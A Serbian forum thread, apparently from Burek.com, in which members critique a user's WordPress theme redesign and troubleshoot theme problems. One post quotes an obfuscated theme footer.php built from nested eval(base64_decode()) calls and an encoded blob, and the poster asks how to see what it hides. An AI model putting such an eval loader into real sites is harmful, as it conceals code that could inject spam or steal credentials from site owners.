Prijava na forum:
Ime:
Lozinka:
Prijavi me trajno:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:

ConQUIZtador
nazadnapred
Korisnici koji su trenutno na forumu 0 članova i 1 gost pregledaju ovu temu.

Tema za pitanja
o SMF forumu, phpBB2 i phpBB3 forumu, Wordpress i Joomla CMS sistemima!

Za vecinu drugih pitanja nacicete odgovor citajuci Top teme!

Idi dole
Stranice:
1 ... 21 22 24 25 ... 124
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
Tema: HowTo: Instalacija WordPress 2.0x CMS / Blog sistema  (Pročitano 281579 puta)
Veteran foruma
Svedok stvaranja istorije

Reign in Blood

Zodijak Cancer
Pol Muškarac
Poruke 20579
Zastava SRBIJA
OS
Windows XP
Browser
Opera 9.62
Odlicno- ja sam isto nasao ono sto si ti naveo. Da- ja volim plug inove jer kad butam po samom skriptu i menjam onda je cela pogibija kad promenim temu ili nadogradim WP. Tako sam ovu temu Options menjao menjao menjao i na kraju mi dodijalo. Kad skupim sna gu opet moram da menjam delove skripta da bih autorima dao slike koje imam na sajtu umesto onih gravatara i osim toga moram da podesim da se clanci deel jer je ocajno nepregledno kad se razvuce u bolesno dugu traku.
IP sačuvana
social share

Pogledaj profil WWW Skype

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Zvezda u usponu

Go ahead, make my day

Zodijak Capricorn
Pol Muškarac
Poruke 1430
Zastava Београд
OS
Windows XP
Browser
Opera 9.60
Pozdrav za sve wordpressadzije.

Pre 15ak dana sam nasao jednu wp temu koja mi se svidela, ali je bila prilicno jednostavna, pa sam resio da je izmenim. Vremenom sam dosao do sasvim drugacijeg izgleda, pa sam pomislio da mogu da je 'preuzmem' za sebe, tj da kazem da sam ja autor iste. Nakon konsultacija sa autorom izvorne teme, koji mi je dao dozvolu za redizajn, to sam i uradio.

Koncepciju same teme sam totalno izmenio i plan kostura razradio. Sad imam da uradim samo detalje (sto je i najtezi posao) Smile ali bih voleo da je pogledate i date mi neke predloge, komentare i slicno. Kritike su apsolutno dobrodosle jer ce  mi svakako biti od koristi.

Link ka temi imate na kraju posta (konsultovao sam se sa SF, dozvolio mi je da postavim link, sustina nije spamovanje, vec zelja da od teme napravim nesto dobro i korisno).

Nekoliko bitnih stvari treba da napomenem:
1. Postovi sa leve strane treba da imaju mogucnost ubacivanja slika (Thumbnaila) na pocetnoj strani, verovatno ce biti bolje ako tako uradim.
2. Sidebar-ovi trenutno nemaju mogucnost idealnog ubacivanja Widgeta, ja ih u sustini ne koristim, vec preko koda ubacujem sve sto mi treba. Ipak radicu na tome da sredim da moze i widget da se ubaci.
3. Chat na krajnjem desnom sidebaru ne bi bio funkcionalan za svakoga ko instalira temu, vec bi morao sam da ga ubaci. Jednostavno je ali ipak za konacnu verziju teme tu bi se nalazilo nesto drugo, npr prostor za banere i sl.
4. bottom.php trenutno sredjujem, trebalo bi ga uskladiti sa izgledom teme.
5. Kada odete na single post, mozda cete imati problema sa sidebarom, koji ce nestati, tj otici dole, ispod posta. To je problem i sa izvornom temom, ja sam sredio jedan deo, ali ima opcija (kada je ping ukljucen a komentar zabranjen) kada ne valja. To moze da se sredi, samo kada budem dosao do te stavke.
6. Fontove generalno treba da uskladim, trenutno su, cini mi se, dosta izmesani.
7, Footer treba srediti, da se malo nabudzi da izgleda kvalitetnije.

Mozda sam trebao da uradim celu temu pa tek onda da postavim ovde, ali mislim da je bolje da dok je radim, na osnovu vasih komentara sredjujem, nego da izgubim vreme i onda ponovo menjam kompletiranu temu.

Ukoliko imate predloga sta bih mogao da dodam (pluginove), anketu, kalendar i sl, recite mi, bice mi od pomoci svakako.

Za kraj, preporuka je da se za pregled koristi Opera ili Firefox, optimizaciju za IE radim, sredicu i to, ali mi treba vremena.

Vremenom cu da vas obavestavam o izmenama na temi, pa kad je zavrsim, postavicu da je isprobate. Treba fajlove da sredim, kako bi svako mogao da se snadje kad bude koristio temu.

Jos jedan pozdrav.

Link je www.markoni4s.com
IP sačuvana
social share
Go ahead, make your bed
Pogledaj profil Skype Twitter

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Prijatelj foruma
Poznata licnost

Drugovi, drugovi, ... pa u drugom stanju...

Zodijak Gemini
Pol Muškarac
Poruke 2954
Zastava Vienna
OS
Windows XP
Browser
Mozilla Firefox 3.0.5
mob
HTC Sensation XL
3. Lichno predlazhem da umjesto chata iskodirash neki flash shoutbox... Dinamichan i mocan...
6. Fonta odaberi dva najvishe... Lichno bih za naslove i sl. odabrao Script MT, a ovo ostalo nisam siguran...mozhda Tintin
Iskodiraj da kada neko selektuje dio teksta da select text bude markupa samo promijene boje texta, konkretno svijetlije...
Koriguj hover link propertije za categories...
7. Za footer imam ideju ali ne znam kako da ti objasnim...ako hocesh da ti iskodiram template pa ti prebacim source..??

Josh par predloga...
Ubaci neki backgdounr na ovaj fazon http://www.mozilla.com/en-US/firefox/ ...
Ja bih lichno uradio neki obliji tribal...
Nabudzhi malo navigaciju...
Za slike napravi klasu da imaju okvir i padding 2 px... Napravi pseudo elemente za tu klasu da izgledaju dobro...
Toliko od mene...Sve pohvale za rad i trud...  Smile Smile

IP sačuvana
social share
To je kao da kazes da nisi primetio ljubicastog slona sa neonskim osvetljenjem u guzici kako stoji pored tebe u mracnoj sobi Smiley
Pogledaj profil WWW

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Moderator
Capo di tutti capi

Underpromise; overdeliver.

Zodijak Gemini
Pol Muškarac
Poruke Odustao od brojanja
Zastava 44°49′N - 20°29′E
OS
Windows Vista
Browser
Opera 9.63
mob
Apple iPhone 6s
Generalno.. ti sve sto nisi znao da uradis kroz css, uradio si kroz slike...

Headeri boksova su slicice, a to ne valja...
Header celog sajta isto...
Sto se tipografije tice, ona jeste losa, ali tu ne treba previse rada da se sredi...
IP sačuvana
social share
Pobednik, pre svega.

Napomena: Moje privatne poruke, icq, msn, yim, google talk i mail ne sluze za pruzanje tehnicke podrske ili odgovaranje na pitanja korisnika. Za sva pitanja postoji adekvatan deo foruma. Pronadjite ga! Takve privatne poruke cu jednostavno ignorisati!
Preporuke za clanove: Procitajte najcesce postavljana pitanja!
Pogledaj profil WWW GTalk Twitter Facebook

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Zvezda u usponu

Go ahead, make my day

Zodijak Capricorn
Pol Muškarac
Poruke 1430
Zastava Београд
OS
Windows XP
Browser
Opera 9.27
@Vodis li na pivo

OK, hvala ti. Dobri su ti predlozi, pokusacu i te varijante.

Koriguj hover link propertije za categories...
7. Za footer imam ideju ali ne znam kako da ti objasnim...ako hocesh da ti iskodiram template pa ti prebacim source..??

To za hover sam video vec, nego nikako da izmenim... Smile

Za footer mozes preko PP da mi posaljes kakvu ideju imas, planiram i ja nesto, svakako moze da posluzi.

@SF

To sa slicicama na headerima boxova sam video da nije idealno, ukoliko postoji mogucnost da se tako uradi u CSS (da tekst ide izmedju top bordera, naci cu i uraditi tako, ako ne, postavicu nesto obicno.

Za header: Pokusao sam na desnu stranu da stavim baner, nije izgledalo dobro u Firefoxu i IE, pa sam batalio, ali mislim da znam gde sam pogresio.
Svakako cu  umetnuti jos stvari.

Hvala vam. Smile
IP sačuvana
social share
Go ahead, make your bed

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Svakodnevni prolaznik

Zodijak Gemini
Pol Muškarac
Poruke 490
Zastava
OS
Windows XP
Browser
Mozilla Firefox 3.0.5
Zanima me nešto što je više vezano za PHP nego za Wordpress, a pitanje postavljam ovde jer se to kod mnogih besplatnih tema za WP pojavljuje:

Naime, footer.php se često "zaključava" (encyptuje) da bi autori "sa daljine" mogli da ubaciju link ka sponzorima! Nemam ništa protiv, ako je to uslov za besplatno korišćenje teme! Ali na ovaj način u kod može da se sakrije bilo šta: od spam mailova pa do prikupljanja UN i PW usera i administratora. Zato hoću da vidim šta se krije iz koda koji izgleda ovako:

Kod:
<?php 

$o
="QAAAO2NucSduYzolYWhoc2J1JQggOQoNDgFMKmpiaXIBkg47a245AAA7ZidvdWJhOiU7OHdvdydlAABraGBuaWFoLyBydWsgLjwnAAA4OSglOU9oamInV2ZgYjsoDYBmOTsoA3AFgA4DIgCRDiNkcnRzaBABalh3AjBYa25pbHQnOidwdwCwIAB0cwFSdC8gdGh1c1hkaGtyaiAAaToIMVhodWNidSFjYndzbzoBADYhc25za2IDEDohYmRvaDo3mAAHwAoNBd8F1XRzdVh1YndrZmRiIDIvJQxEJSsnJSd7JwDnCX8uPAVUdwYsdW5pcycCHwIADg44E3IoFMAAkSEkAAA2MT48J0RodWwnV3VidHQnoDAPkicEM2Nmc2IvIF4K8BKwJ1NvYoAEEqBDYnRuYGliYydFfj0I8XNmAAR1YGJzOiVYZWtmaWwlFxRvcwAAc3c9KChwcHApZmNocClkaABAaih0Zmp3a2IqBmByamJ0KCUhxDlUARInVWJ0AREX8Q4gSmZjGPBodAcDdG5la2IGVRxjBVhhbnV0c2oXYBlQARUpaWJzKCUnFlI6JUoBUGABYHQBILDACbs5AbYGslBuc28MEQXOYGtodW5oAcdydGVuaWBoC6EEoBwROiVFASEA4AWMWOFAAxQnAgIF0kZpYwXPENAdUmhhc2IQsNWBFdAF6lAjUHcR4HQWowwfOUF1YmInAn3BAwcBJMA7ZXUnKB0xO3RqZmtrL8cTZAgAcWZrbh0AaHUpcDQpaHVgKGQEoG9iZGwoMfBidTTRUQIBJ19PU0pIEUsFIScqDA5tbmB0ZnAD9nR0KgVGwkcE3wbQJ0RUVASxOygJIwoNOyd0KoEmg9wMNIA84y848gGSAlY7KGVoY34NQAOhb3MAAGprOQ==";

eval(
base64_decode("JGxsbD0wO2V2YWwoYmFzZTY0X2RlY29kZSgiSkd4c2JHeHNiR3hzYkd4c1BTZGlZWE5sTmpSZlpHVmpiMlJsSnpzPSIpKTskbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd3OUoyOXlaQ2M3IikpOyRsbGxsPTA7JGxsbGxsPTM7ZXZhbCgkbGxsbGxsbGxsbGwoIkpHdzlKR3hzYkd4c2JHeHNiR3hzS0NSdktUcz0iKSk7JGxsbGxsbGw9MDskbGxsbGxsPSgkbGxsbGxsbGxsbCgkbFsxXSk8PDgpKyRsbGxsbGxsbGxsKCRsWzJdKTtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JHdzlKM04wY214bGJpYzciKSk7JGxsbGxsbGxsbD0xNjskbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGxsbGxsbGwoJGwpOyl7aWYoJGxsbGxsbGxsbD09MCl7JGxsbGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsbGxsbCs9JGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTskbGxsbGxsbGxsPTE2O31pZigkbGxsbGxsJjB4ODAwMCl7JGxsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8NCk7JGxsbCs9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbF0pPj40KTtpZigkbGxsKXskbGw9KCRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSkmMHgwZikrMztmb3IoJGxsbGw9MDskbGxsbDwkbGw7JGxsbGwrKykkbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGxdPSRsbGxsbGxsbFskbGxsbGxsbC0kbGxsKyRsbGxsXTskbGxsbGxsbCs9JGxsO31lbHNleyRsbD0oJGxsbGxsbGxsbGwoJGxbJGxsbGxsKytdKTw8OCk7JGxsKz0kbGxsbGxsbGxsbCgkbFskbGxsbGwrK10pKzE2O2ZvcigkbGxsbD0wOyRsbGxsPCRsbDskbGxsbGxsbGxbJGxsbGxsbGwrJGxsbGwrK109JGxsbGxsbGxsbGwoJGxbJGxsbGxsXSkpOyRsbGxsbCsrOyRsbGxsbGxsKz0kbGw7fX1lbHNlJGxsbGxsbGxsWyRsbGxsbGxsKytdPSRsbGxsbGxsbGxsKCRsWyRsbGxsbCsrXSk7JGxsbGxsbDw8PTE7JGxsbGxsbGxsbC0tO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkd4c2JEMG5ZMmh5SnpzPSIpKTskbGxsbGw9MDtldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkQwaVB5SXVKR3hzYkd4c2JHeHNiR3hzYkNnMk1pazciKSk7JGxsbGxsbGxsbGw9IiI7Zm9yKDskbGxsbGw8JGxsbGxsbGw7KXskbGxsbGxsbGxsbC49JGxsbGxsbGxsbGxsbCgkbGxsbGxsbGxbJGxsbGxsKytdXjB4MDcpO31ldmFsKCRsbGxsbGxsbGxsbCgiSkd4c2JHeHNiR3hzYkM0OUpHeHNiR3hzYkd4c2JHd3VKR3hzYkd4c2JHeHNiR3hzYkNnMk1Da3VJajhpT3c9PSIpKTtldmFsKCRsbGxsbGxsbGwpOw=="));return;
?>

Postoje neki online dekoderi ili mogućnost dekodiranja uz pomoć skripte na serveru (decrypt.php) ... Više detalja ovde: link

Ali ni to ne pomaže u slučaju gore navedenog koda???!!!

Da li zna neko način da se to otključa, jer kapiram da svaki browser to može (u suprotnom ne bi prikazivao footer)!!! Prosto kopiranje dela iz page source  u footer.php ne pomaže, to jednostavno nije to!

I kako uopšte browser zna da otključa zaključani kod?
IP sačuvana
social share
Pogledaj profil

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Zvezda u usponu

Go ahead, make my day

Zodijak Capricorn
Pol Muškarac
Poruke 1430
Zastava Београд
OS
Windows XP
Browser
Opera 9.60
Ja sam imao takav problem sa jednom temom, i nisam mogao da resim.

Ne znam da li bi mogao da napravis novi footer.php koji bi se zvao drugacije i pozivao njega u index.php i ostalim fajlovima gde je potrebno..

Ili jednostavno obrises te fajlove i napravis nove.

Mada verovatno nije moguce jer kazes da su zakljucani, ali mozda su zakljucani samo za izmenu, ja nisam uspeo da menjam, al nisam pokusao da obrisem i napravim novi..
IP sačuvana
social share
Go ahead, make your bed

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Svakodnevni prolaznik

Zodijak Gemini
Pol Muškarac
Poruke 490
Zastava
OS
Windows XP
Browser
Mozilla Firefox 3.0.5
Ja sam imao takav problem sa jednom temom, i nisam mogao da resim.

Ne znam da li bi mogao da napravis novi footer.php koji bi se zvao drugacije i pozivao njega u index.php i ostalim fajlovima gde je potrebno..

Ili jednostavno obrises te fajlove i napravis nove.

Mada verovatno nije moguce jer kazes da su zakljucani, ali mozda su zakljucani samo za izmenu, ja nisam uspeo da menjam, al nisam pokusao da obrisem i napravim novi..

Ma moguće je napraviti novi footer "od nule" ali to može da bude sex jer se često poremeti i sidebar i mnogo toga. Sam fajl naravno nije zaključan, može on da se otvori u text editoru( ili dreamweaver-u) nego je njegov sadržaj "enkriptovan" i izgleda kao na gore navedenom primeru. Mene buni, kako browseri (Mozilla. Opera IE itd) znaju da pravilno dešifruju taj kod, a kao nema šansei da ga ja vidim u normalnom obliku kroz neki dekoder ili sl.
IP sačuvana
social share
Pogledaj profil

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Zvezda u usponu

Go ahead, make my day

Zodijak Capricorn
Pol Muškarac
Poruke 1430
Zastava Београд
OS
Windows XP
Browser
Opera 9.60
Ne bih znao, u svakom slucaju ja bih kucao novi footer, naravno napravis kopije fajlova i pazis da ga lepo umetnes u celu koncepciju. Smile
IP sačuvana
social share
Go ahead, make your bed

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Svakodnevni prolaznik

Zodijak Gemini
Pol Muškarac
Poruke 490
Zastava
OS
Windows XP
Browser
Mozilla Firefox 3.0.5
Ima jedna misteriozna pojava kod mene na sajtu. Naime, kada me neko po prvi put poseti, a koristi IE, browser se zaglupi i izadje poruka kao na sl.br.1. Kad hoćeš da ga ugasiš, izadje obaveštenje kao na sl.br.2? Kad sledeću put posetiš isti saj, sve OK! Iz Mozille i Opere sve normalno radi! Probao sam sa više računara (od kuće, sa posla)... uvek isto! U pitanju je IE 7!

Fajlovi prikačeni uz poruku (kliknite na slike za punu veličinu)

Untitled-1.jpg
(29.55 KB, 410x128)
Untitled-2.jpg
(38.05 KB, 333x156)
IP sačuvana
social share
Pogledaj profil

Prijava na forum:
Ime:
Lozinka:
Zelim biti prijavljen:
Trajanje:
Registruj nalog:
Ime:
Lozinka:
Ponovi Lozinku:
E-mail:
Idi gore
Stranice:
1 ... 21 22 24 25 ... 124
Počni novu temu Nova anketa Odgovor Štampaj Dodaj temu u favorite Pogledajte svoje poruke u temi
nazadnapred
Prebaci se na:  

Poslednji odgovor u temi napisan je pre više od 6 meseci.  

Temu ne bi trebalo "iskopavati" osim u slučaju da imate nešto važno da dodate. Ako ipak želite napisati komentar, kliknite na dugme "Odgovori" u meniju iznad ove poruke. Postoje teme kod kojih su odgovori dobrodošli bez obzira na to koliko je vremena od prošlog prošlo. Npr. teme o određenom piscu, knjizi, muzičaru, glumcu i sl. Nemojte da vas ovaj spisak ograničava, ali nemojte ni pisati na teme koje su završena priča.

web design

Forum Info: Banneri Foruma :: Burek Toolbar :: Burek Prodavnica :: Burek Quiz :: Najcesca pitanja :: Tim Foruma :: Prijava zloupotrebe

Izvori vesti: Blic :: Wikipedia :: Mondo :: Press :: Naša mreža :: Sportska Centrala :: Glas Javnosti :: Kurir :: Mikro :: B92 Sport :: RTS :: Danas

Prijatelji foruma: Triviador :: Nova godina Beograd :: nova godina restorani :: FTW.rs :: MojaPijaca :: Pojacalo :: 011info :: Burgos :: Sudski tumač Novi Beograd

Pravne Informacije: Pravilnik Foruma :: Politika privatnosti :: Uslovi koriscenja :: O nama :: Marketing :: Kontakt :: Sitemap

All content on this website is property of "Burek.com" and, as such, they may not be used on other websites without written permission.

Copyright © 2002- "Burek.com", all rights reserved. Performance: 0.052 sec za 13 q. Powered by: SMF. © 2005, Simple Machines LLC.